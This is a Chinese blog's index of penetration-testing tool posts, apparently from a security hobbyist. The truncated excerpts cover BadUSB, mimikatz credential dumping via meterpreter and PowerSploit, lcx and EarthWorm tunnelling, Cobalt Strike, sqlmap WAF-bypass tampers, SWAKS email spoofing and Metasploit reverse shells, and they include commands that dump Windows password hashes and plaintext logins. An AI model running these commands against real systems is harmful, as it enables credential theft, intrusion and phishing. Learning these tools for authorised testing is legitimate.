渗透工具
浅笑⁹⁹⁶
这个作者很懒,什么都没留下…
展开
-
使用digispark制作一个BadUSB
0X00、工具准备digispark开发板。淘宝连接:https://m.tb.cn/h.VK7vwjy?sm=d858440X01、安装Arduino IDE环境1、安装 arduino 的 IDE。下载地址:https://www.arduino.cc/en/Main/Software新版下载:https://downloads.arduino.cc/arduino-1.8.3-windows.zip2、下载驱动链接:http...原创 2020-07-03 16:11:26 · 3626 阅读 · 3 评论 -
meterpreter中使用mimikatz获取windows密码
进去meterpreter后getuid一下这获得系统管理员权限开始加载mimikatz模块load mimikatz加载成功.第一种方法:获取登录密码的hash值msv上面已经是得到hash值了. 下面算明文密码.获取明文密码kerberoslook...拿到登录的明文密码了.第二种方法:使用另一种方式获取哈希值mimikatz_command -f samdump::hashes根据上面的方式获取明文密码...原创 2020-07-01 14:54:08 · 4238 阅读 · 0 评论 -
内网代理工具--EarthWorm
一、简介 EarthWorm是内网穿透的神器,拥有三项功能正向代理,反向代理,端口转发。为实现这些功能,EarthWorm建立了六大功能模块。分别是ssocksd , rcsocks , rssocks ,lcx_listen , lcx_tran , lcx_slave。从三项功能的角度可以这样划分 功能名称 对应模块 正向代理 ssocksd 反向代理 rcsoc...原创 2020-06-29 14:49:57 · 2096 阅读 · 0 评论 -
端口转发工具--lcx
简介 lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入侵工具,lcx在内网入侵渗透中起着重要的角色。lcx进行端口转发的原理就是使不同端口之间形成一个回路。它常用于外网连接内网3389端口。使用1.将本地接口转发到远程主机的端口。攻击者ip:192.168.1.2受害者ip:192.168.1.3将lcx.exe上传到受害者主机..原创 2020-06-29 14:50:14 · 1211 阅读 · 0 评论 -
FrameScan-GUI CMS漏洞扫描
工具简介FrameScan-GUI是一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架,是FrameScan的加强版。支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。Github地址:https://github.com/qianxiao996/FrameScan-GUI下载地址:https://github.com/qianxiao996/FrameScan-GUI/releases支持平台原创 2020-06-28 18:12:55 · 1468 阅读 · 0 评论 -
FrameScan CMS漏洞扫描
工具简介GithubL:https://github.com/qianxiao996/FrameScanFrameScan是一款python3编写的简易的cms漏洞检测框架,支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。支持平台 Windows Linux MAC(请自测) 工具特点 单URL批量检测 单URL单漏洞检测 单URL指定CMS检测 多原创 2020-06-28 18:06:42 · 750 阅读 · 0 评论 -
Metasploit笔记
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。0x01 基本操作1、运行Shell中直接输入msfconsole2、建立搜索缓存(数据库)启动PostgreSQL数据库服务 :...转载 2018-10-21 21:01:02 · 345 阅读 · 0 评论 -
Python knife 一款伪菜刀
Python knife 一款伪菜刀。 设计之初,本想只写个命令行的就可以了,但又想与众不同,想用python写代码,又不想用c#写前端(c#太卡了),万分无奈之下,找到一个替代品,Pyqt,所以我这个简易的菜刀就由此开始了。本程序实在python3下开发的。GUI界面用的Pyqt模块既然想用pyqt做界面,第一步就是先装好pyqt,Python knife介绍视频htt...原创 2018-12-05 09:58:32 · 1427 阅读 · 0 评论 -
CTF-Tools 一款CTF古典密码加解密工具
CTF-Tools一款CTF编码、解码、加密、解密工具。支持的编码解码:URL-UTF-8 URL-GB2312 Unicode Escape(%U) HtmlEncode ACSII Base16 Base32 Base64 Str->Hex Shellcode支持的加密解密:Rot13 凯撒密码 栅栏密码 培根密码 摩斯密码 移位密码 云影密码 当铺密码 维尼吉亚密码进制转换:2->8 2->10 2->16原创 2020-06-28 17:16:02 · 7070 阅读 · 0 评论 -
PowerSploit的使用
Invoke-Mimikatz(依赖管理员)Import-Module .\invoke-mimikatz.ps1Invoke-Mimikatz –DumpCreds使用Invoke-Mimikatz –command “mimikatz命令”来执行命令:Invoke-Mimikatz –command "token::elevate"Invoke-Ninjacopy (依赖管理...原创 2019-03-26 18:07:55 · 666 阅读 · 0 评论 -
SQLMap参数命令
SQLMap参数命令 --method=<http方法> 指定使用的http方法 --data=<post数据> 提交post数据并对post数据进行测试 --param-del=<分隔符> 指定参数的分隔符 ...原创 2018-11-10 18:46:14 · 2624 阅读 · 0 评论 -
SWAKS伪造邮件发送
一、SWAKS介绍swaks(SWiss Army Knife Smtp)SMTP瑞士军刀Swaks是由John Jetmore编写和维护的一种功能强大,灵活,可脚本化,面向事务的SMTP测试工具。可向任意目标发送任意内容的邮件kali自带官方网站:http://www.jetmore.org/john/code/swaks/二、基本使用swaks -to xxx@qq.com测试邮...原创 2018-11-17 15:21:59 · 15062 阅读 · 0 评论 -
Cobalt Strike的使用
0x00 Cobalt Strike简介 Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。而Cobalt...原创 2018-11-15 12:05:38 · 11267 阅读 · 6 评论 -
Cobalt Strike的安装
一.下载压缩包下载回来之后,可以看到里面的文件有这些: 其中搭建团队服务器端的关键文件有两个,一个是cobaltstrike.jar,另一个是teamserver,这里我打算将团队服务器端搭在我的vps上。将这两个文件上传到我的vps中,注意这两个都需要,只传一个会报错,而且也不需要其他文件,其中需要对teamserver这个文件进行赋权操作。 之后启动teamserver就可以了,...原创 2018-11-12 14:13:39 · 11946 阅读 · 2 评论 -
maltego的基本使用
首次使用maltego需要注册注册网站:https://www.paterva.com/web7/buy/maltego-clients/maltego-ce.php填写好点注册就行了1. 打开maltego命令行输入 maltego或者点击桌面的图标打开后2.使用Maltego会出现这个对话框输入域名,点击结束会出现各种窗口,一直ok就行了完成后是...原创 2018-11-14 17:44:12 · 16783 阅读 · 19 评论 -
sqlmap的使用手册
0x01. Sqlmap支持的数据库 SQLMap支持的数据库: MySQL Oracle PostgreSQL Microsoft SQL Server Microsoft Access ...原创 2018-11-10 22:39:38 · 300 阅读 · 0 评论 -
sqlmap的常用tamper脚本
sqlmap下的tamper目录存放绕过WAF脚本使用方法 --tamper 脚本名称,脚本名称多个tamper脚本之间用空格隔开 apostrophemask.py 用utf8代替引号 equaltolike.py like代替等号 space2dash.py 绕过过滤‘=...原创 2018-11-02 17:01:50 · 3133 阅读 · 0 评论 -
w3af漏扫的基本使用
一、安装apt安装 apt-get update apt-get install -y w3af出现无法定位软件包源码安装sudo apt-get install gitsudo apt-get install python-pipgit clone https://github.com/andresriancho/w3af.gitcd w3af/./w3af_c...原创 2018-11-05 14:05:56 · 1783 阅读 · 0 评论 -
MSF基本使用
MSF链接数据库linux查找文件 find / -name dabase.yml链接数据库 db_connect -y path/database.ymldb_status 查询数据库链接状态payload: windows/x64/meterpreter/reverse_tcp 命令 (以下命令基于这个payload)background 后台sessions...原创 2018-11-10 18:46:22 · 2660 阅读 · 0 评论